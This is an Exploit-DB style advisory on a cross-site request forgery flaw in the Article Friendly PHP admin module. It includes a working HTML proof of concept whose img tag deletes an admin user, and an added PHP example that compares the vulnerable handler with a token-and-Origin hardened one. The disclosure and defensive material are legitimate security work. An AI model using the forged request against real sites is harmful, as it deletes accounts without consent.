Article Friendly - Cross-Site Request Forgery

EDB-ID: 11559

CVE: N/A

Platform: PHP

Date: 2010-02-24


=======================================================================

                    Article Friendly CSRF Vulnerability

=======================================================================

                                   by

                             Pratul Agrawal


  # Vulnerability found in   Admin module

  # email                    Pratulag@yahoo.com

  # company                  aksitservices

  # Credit by                Pratul Agrawal

  # Site page                http://www.articlefriendly.com/

  # Platform                 PHP
 
  
  
  # Proof of concept   #

  Targeted URL:  http://server/admin/index.php?filename=adminlogin

  The admin user-management action is triggered by a plain GET request and is protected only
  by the administrator's session cookie, which the browser attaches to any request it makes,
  so a page under the attacker's control can issue the request on the administrator's behalf.
  Script to delete an admin user through cross-site request forgery (the administrator must be
  logged in to the application while the page below is viewed; [USER ID] is the target's adminid):

  ..................................................................................................................

  <html>
    <body>
      <!-- Forged GET request: the victim's browser sends the admin session cookie with it -->
      <img src="http://server/admin/index.php?filename=adminuser&a=3&adminid=[USER ID]" />
    </body>
  </html>

  ..................................................................................................................

  After the page has loaded, refresh the admin user list: the user with the given ID has been
  deleted without any confirmation.
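  The following PHP is an added example and is not Article Friendly's code; the handler names,
  the request/session arrays and the "http://server" origin are assumptions made for
  illustration. It contrasts the forgeable pattern the proof of concept abuses (a state-changing
  action authorised by the session cookie alone, reachable by GET) with a hardened handler that
  requires POST, a per-session secret token compared in constant time, and an Origin header that
  matches the application when the browser sends one. The script runs from the CLI with
  constructed data and throws if any of the four cases behaves unexpectedly.

```php
<?php
// Added example, not Article Friendly code. All function and parameter names are hypothetical.
declare(strict_types=1);

// Vulnerable pattern: the action is authorised by the session cookie and GET parameters only.
// A forged <img> request carries the victim's cookie, so this check passes and the delete runs.
function vulnerable_delete(array $session, array $get, array &$users): bool
{
    if (empty($session['admin_logged_in'])) {
        return false;
    }
    if (($get['a'] ?? '') !== '3' || !isset($get['adminid'])) {
        return false;
    }
    unset($users[(int) $get['adminid']]);
    return true;
}

// Hardened pattern, part 1: a per-session secret the admin UI embeds in its forms.
// An attacker's page cannot read it because of the same-origin policy.
function issue_csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hardened pattern, part 2: POST only, token required and compared in constant time,
// and (defence in depth) the Origin header must match the site when the browser sends it.
function hardened_delete(array $session, array $server, array $post, array &$users): bool
{
    if (empty($session['admin_logged_in'])) {
        return false;
    }
    if (($server['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return false;                                   // an <img> tag can only send GET
    }
    $expected = (string) ($session['csrf_token'] ?? '');
    $sent     = (string) ($post['csrf_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $sent)) {
        return false;                                   // token missing or wrong
    }
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== 'http://server') {  // assumed application origin
        return false;                                   // cross-site form post
    }
    if (($post['a'] ?? '') !== '3' || !isset($post['adminid'])) {
        return false;
    }
    unset($users[(int) $post['adminid']]);
    return true;
}

// Demonstration with constructed data.
$session = ['admin_logged_in' => true];

// 1. The advisory's forged request: GET ...?filename=adminuser&a=3&adminid=2 succeeds.
$users = [1 => 'admin', 2 => 'editor'];
$forgedGet = ['filename' => 'adminuser', 'a' => '3', 'adminid' => '2'];
if (!vulnerable_delete($session, $forgedGet, $users) || isset($users[2])) {
    throw new RuntimeException('vulnerable handler should have deleted user 2');
}

// 2. Same forgery against the hardened handler: GET with no token is rejected.
$users = [1 => 'admin', 2 => 'editor'];
issue_csrf_token($session);
if (hardened_delete($session, ['REQUEST_METHOD' => 'GET'], [], $users) || !isset($users[2])) {
    throw new RuntimeException('hardened handler accepted a GET forgery');
}

// 3. Auto-submitted POST from an attacker page: token unknown, Origin is the attacker's site.
$attackerPost = ['a' => '3', 'adminid' => '2', 'csrf_token' => 'guess'];
$attackerServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'];
if (hardened_delete($session, $attackerServer, $attackerPost, $users) || !isset($users[2])) {
    throw new RuntimeException('hardened handler accepted a POST forgery');
}

// 4. Legitimate POST from the admin UI carrying the session's own token succeeds.
$adminPost = ['a' => '3', 'adminid' => '2', 'csrf_token' => $session['csrf_token']];
$adminServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://server'];
if (!hardened_delete($session, $adminServer, $adminPost, $users) || isset($users[2])) {
    throw new RuntimeException('hardened handler rejected a legitimate request');
}
echo "all four cases behaved as expected\n";
```

  Requiring POST on its own is not a fix: an attacker page can auto-submit a hidden form, which
  is why case 3 is defeated by the token rather than by the method check. The Origin comparison
  is a second layer only, since older clients omit the header. On current browsers, marking the
  session cookie SameSite=Lax or Strict additionally stops the cookie from being sent on the
  cross-site <img> request, but a server-side token remains the primary control.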


#If you have any questions, comments, or concerns, feel free to contact me.